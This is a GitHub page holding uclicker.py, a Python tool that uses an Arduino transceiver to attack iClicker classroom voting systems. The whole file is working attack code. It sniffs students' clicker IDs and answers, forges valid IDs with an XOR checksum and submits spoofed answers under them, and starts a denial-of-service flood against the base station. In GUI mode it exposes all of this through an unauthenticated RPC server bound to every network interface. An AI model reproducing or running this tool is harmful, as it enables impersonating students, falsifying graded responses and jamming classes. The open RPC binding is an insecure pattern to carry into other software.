-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathuclicker.py
401 lines (353 loc) · 11.5 KB
/
uclicker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
from time import sleep
import serial
import threading
import sys
import argparse
import random
import zerorpc
import struct
import readline
import subprocess
class DummySerial:
    '''
    Stand-in for the serial connection, used when the
    command line is run without a transceiver port.
    '''

    def write(self, x):
        '''
        Echoes the outgoing data to stdout instead of
        sending it to a device (useful for debugging).
        '''
        print(x)
class Question():
    '''
    Holds all captured information
    for a single iClicker question
    '''

    def __init__(self):
        # map from iclicker_id -> current_answer
        self.map_id_answer = {}
        # map from answer string -> current total of clickers on that answer
        self.map_answer_total = {
            'A': 0,
            'B': 0,
            'C': 0,
            'D': 0,
            'E': 0
        }
        # list of (iclicker_id, answer) tuples, oldest first and
        # most recently active last
        self.sender_list = []

    def register_sender(self, sender):
        '''
        Takes in an (iclicker_id, answer) tuple and moves that iclicker
        to the end of the sender list, so the list stays ordered from
        least to most recently active.
        '''
        (iclicker_id, ans) = sender
        # drop the existing entry for this id, if any
        for iclicker in self.sender_list:
            if iclicker[0] == iclicker_id:
                self.sender_list.remove(iclicker)
                break
        # most recent entry goes last
        self.sender_list.append((iclicker_id, ans))

    def save_message(self, iclicker_message):
        '''
        Processes an incoming iClicker message if it exists.

        :param iclicker_message: (answer, iclicker_id) tuple, or None
        :return: nothing

        Messages whose answer is not one of the tracked choices
        (including 'P', the ack for switching frequencies) are ignored.
        '''
        if iclicker_message is None:
            return
        answer, iclicker_id = iclicker_message
        # Reject unknown answers BEFORE touching any totals; otherwise the
        # previous answer would be decremented and the increment would then
        # fail with KeyError, leaving the tallies inconsistent.
        if answer not in self.map_answer_total:
            return
        # remove previous answer of this iclicker from the totals
        prev_answer = self.map_id_answer.get(iclicker_id)
        if prev_answer is not None:
            self.map_answer_total[prev_answer] -= 1
        # add to total of current answer
        self.map_answer_total[answer] += 1
        self.map_id_answer[iclicker_id] = answer
        # mark the iclicker as most recently active
        self.register_sender((iclicker_id, answer))

    def get_ids(self, limit=None):
        '''
        Returns up to <limit> (iclicker_id, answer) tuples, taken from the
        most recent submissions and ordered oldest to newest.
        If limit is not provided, all available entries are returned.
        '''
        length = len(self.sender_list)
        if limit is None:
            limit = length
        # Clamp the start index: a limit larger than the list would make it
        # negative, and a negative slice start counts from the end, which
        # would silently return fewer entries than are available.
        start = max(0, length - limit)
        return self.sender_list[start:length]

    def ans(self):
        '''
        Prints a summary of iClicker answers
        collected so far.
        '''
        for k in sorted(self.map_answer_total):
            print(k, self.map_answer_total[k])
class Session():
    '''
    Runs a uClicker session
    with interactive prompt
    '''
    ERR = 'Invalid command'

    def __init__(self, port):
        '''
        Initializes the session and
        connects to the transceiver if port is given.

        :param port: serial port name of the transceiver, or None to run
                     in test mode with a DummySerial
        '''
        # Information captured for each iClicker question
        self.questions = [Question()]
        # Recently captured keyboard input
        self.next_cmd = None
        # Recently captured iClicker message
        self.next_msg = None
        # Mutex for questions data
        self.questions_mutex = threading.Lock()
        # History of commands
        self.history = []
        # Establish connection to Arduino transceiver
        if port is None:
            print('No port given, running in test mode')
            self.ser = DummySerial()
        else:
            self.ser = serial.Serial(port, 115200)
            # Only a real serial port can be read from, so the iClicker
            # listener is started in this branch only.
            threading.Thread(target=self.iclicker_listener,
                             daemon=True).start()
        # Start listening to keyboard
        threading.Thread(target=self.keyboard_listener, daemon=True).start()

    def loop(self):
        '''
        Main loop: polls for captured keyboard input and
        iClicker messages every 10 ms. Never returns normally.
        '''
        while True:
            self.check_keyboard()
            self.check_iclicker()
            sleep(.01)

    def check_iclicker(self):
        '''
        Checks for an incoming iClicker message
        and passes it to the current Question
        '''
        if self.next_msg is not None:
            iclicker_message = self.next_msg
            # 'with' releases the mutex even if save_message raises
            with self.questions_mutex:
                self.questions[-1].save_message(iclicker_message)
            # Restart iClicker listener
            self.next_msg = None
            threading.Thread(target=self.iclicker_listener,
                             daemon=True).start()

    def check_keyboard(self):
        '''
        Processes keyboard input
        if any has been captured.
        '''
        if self.next_cmd is not None:
            self.execute_cmd(self.next_cmd)
            # Restart keyboard listener
            self.next_cmd = None
            threading.Thread(target=self.keyboard_listener,
                             daemon=True).start()

    def execute_cmd(self, cmdstring):
        '''
        Parses commands from interactive prompt
        and calls the corresponding function.

        :param cmdstring: raw line typed at the prompt
        :return: nothing; blank input is ignored, unknown or malformed
                 commands print ERR, 'quit'/'exit' call sys.exit(0)
        '''
        tokens = cmdstring.split()
        # A blank line (user just pressed Enter) yields no tokens; ignore it
        # rather than failing on tokens[0].
        if not tokens:
            return
        command = tokens[0]
        if command in ('quit', 'exit'):
            sys.exit(0)
        elif command == 'reset':
            self.reset()
        elif command == 'ans':
            self.ans()
        elif command == 'ids':
            if len(tokens) >= 2:
                if tokens[1].isdigit():
                    self.ids(int(tokens[1]))
                else:
                    print(self.ERR)
            else:
                self.ids()
        elif command == 'freq':
            if len(tokens) >= 2 and self.validate_freq(tokens[1].upper()):
                self.freq(tokens[1].upper())
            else:
                print(self.ERR)
        elif command == 'send':
            if len(tokens) >= 3 and self.validate_send(tokens[1],
                                                       tokens[2].upper()):
                self.send(tokens[1], tokens[2].upper())
            else:
                print(self.ERR)
        elif command == 'startdos':
            self.startdos()
        elif command == 'stopdos':
            self.stopdos()
        elif command == 'gen':
            print(self.generate_id())
        else:
            print(self.ERR)

    def freq(self, freqchoice):
        '''
        Changes the iClicker frequency to attack on.
        :param freqchoice: choice of frequencies in 2 capital letters [A-D]
        :return: nothing
        '''
        # 8-byte message: action code 98, the two frequency letters,
        # then five filler bytes (97)
        send_str = struct.pack('>B', 98)
        for letter in freqchoice[:2]:
            send_str += struct.pack('>B', ord(letter))
        send_str += struct.pack('>5B', 97, 97, 97, 97, 97)
        self.ser.write(send_str)

    def startdos(self):
        '''
        Starts a DOS attack by spamming iClicker messages.
        '''
        # Send custom opcode for DOS to Arduino
        self.ser.write('cccccccc'.encode())

    def stopdos(self):
        '''
        Halts a DOS attack started earlier.
        '''
        # Send custom opcode for DOS stop to Arduino
        self.ser.write('dddddddd'.encode())

    def send(self, iclicker_id, choice):
        '''
        Send choice to base using alias iclicker_id.
        :param iclicker_id: 8 digit hex string
        :param choice: letter of choice [A, E] USE CAPITALS!!!
        :return: nothing
        '''
        # action code
        send_str = struct.pack('>B', 97)
        # iclicker id: four bytes, each parsed from two hex digits
        for x in range(4):
            fragment = iclicker_id[(2 * x):(2 * (x + 1))]
            send_str += struct.pack('>B', int(fragment, 16))
        # answer choice, encoded as an offset from 'A' (A -> 0 ... E -> 4)
        send_str += struct.pack('>B', ord(choice) - 65)
        # fill in the rest of the bytes for 8 byte format
        send_str += struct.pack('>2B', 97, 97)
        self.ser.write(send_str)

    def reset(self):
        '''
        Move on to a new Question
        '''
        with self.questions_mutex:
            self.questions.append(Question())

    def ans(self):
        '''
        Prints the captured answers for the current question
        '''
        with self.questions_mutex:
            self.questions[-1].ans()

    def ids(self, limit=None):
        '''
        Prints the captured iClicker IDs for the current question
        :param limit: maximum number of most recent entries to print,
                      or None for all of them
        '''
        with self.questions_mutex:
            entries = self.questions[-1].get_ids(limit)
        # Printing happens outside the lock; get_ids returned a copy
        for entry in entries:
            print(entry)

    def keyboard_listener(self):
        '''
        Waits for keyboard input.
        Should be in its own thread.
        '''
        try:
            self.next_cmd = input('(uclicker)> ')
        except EOFError:
            # End of input (e.g. Ctrl-D) is treated as a quit request
            print()
            self.next_cmd = 'quit'

    def iclicker_listener(self):
        '''
        Waits for iClicker messages.
        Should be in its own thread.
        '''
        # Keep reading lines until one parses into a valid message
        while self.next_msg is None:
            self.next_msg = self.parse_message(self.ser.readline())

    @staticmethod
    def parse_message(serial_msg):
        '''
        Takes in serial input from arduino (bytes)
        Returns: (<answer>, <iclicker_id>) or None if bad message
        '''
        try:
            string_msg = serial_msg.decode('utf-8').strip()
        except UnicodeDecodeError:
            # Line noise that is not valid UTF-8 is just a bad message;
            # it must not kill the listener thread.
            return None
        if string_msg == '':
            return None
        # A well-formed message is exactly "<answer>:<iclicker_id>"
        parts = string_msg.split(':')
        if len(parts) != 2:
            return None
        answer, iclicker_id = parts
        return (answer, iclicker_id)

    @staticmethod
    def generate_id():
        '''
        Generates a random iClicker ID.
        iClicker IDs are 4 bytes in hexadecimal,
        where the last byte is an XOR checksum of the first three.

        Returns the four bytes as upper-case 2-digit hex values separated
        by spaces. Note that validate_send expects the 8 hex digits
        without the spaces.
        '''
        b1 = random.randint(0, 255)
        b2 = random.randint(0, 255)
        b3 = random.randint(0, 255)
        b4 = b1 ^ b2 ^ b3
        return ' '.join('{:02X}'.format(b) for b in (b1, b2, b3, b4))

    @staticmethod
    def validate_freq(f):
        '''
        Validates that a given frequency
        is 2 letters of [A-D]
        '''
        return len(f) == 2 and all('A' <= letter <= 'D' for letter in f)

    @staticmethod
    def validate_send(id, choice):
        '''
        Validates the arguments for send
        :param id: iClicker ID, expected as exactly 8 hex digits
        :param choice: single capital letter in [A-E]
        :return: True if both arguments are acceptable, False otherwise
        '''
        if len(choice) != 1 or choice < 'A' or choice > 'E':
            return False
        if len(id) != 8:
            return False
        # int(x, 16) also accepts signs and surrounding whitespace
        # (e.g. '-1'), which would pass the checksum below but cannot be
        # packed into an unsigned byte by send. Require pure hex digits.
        if any(ch not in '0123456789abcdefABCDEF' for ch in id):
            return False
        id_bytes = [int(id[i:i + 2], 16) for i in range(0, 8, 2)]
        # Check that the last byte is an XOR checksum of the first 3
        return id_bytes[3] == (id_bytes[0] ^ id_bytes[1] ^ id_bytes[2])
if __name__ == '__main__':
    # Command-line options: the transceiver's serial port and a flag
    # selecting GUI (RPC server) mode over the interactive prompt.
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('-p', '--port')
    arg_parser.add_argument('--ui', action='store_true')
    options = arg_parser.parse_args()

    session = Session(options.port)

    if not options.ui:
        # Command line mode: run the main listening loop
        session.loop()
    else:
        # GUI mode: expose the session over RPC for the Electron code to call
        rpc_server = zerorpc.Server(session)
        rpc_server.bind('tcp://0.0.0.0:4545')
        rpc_server.run()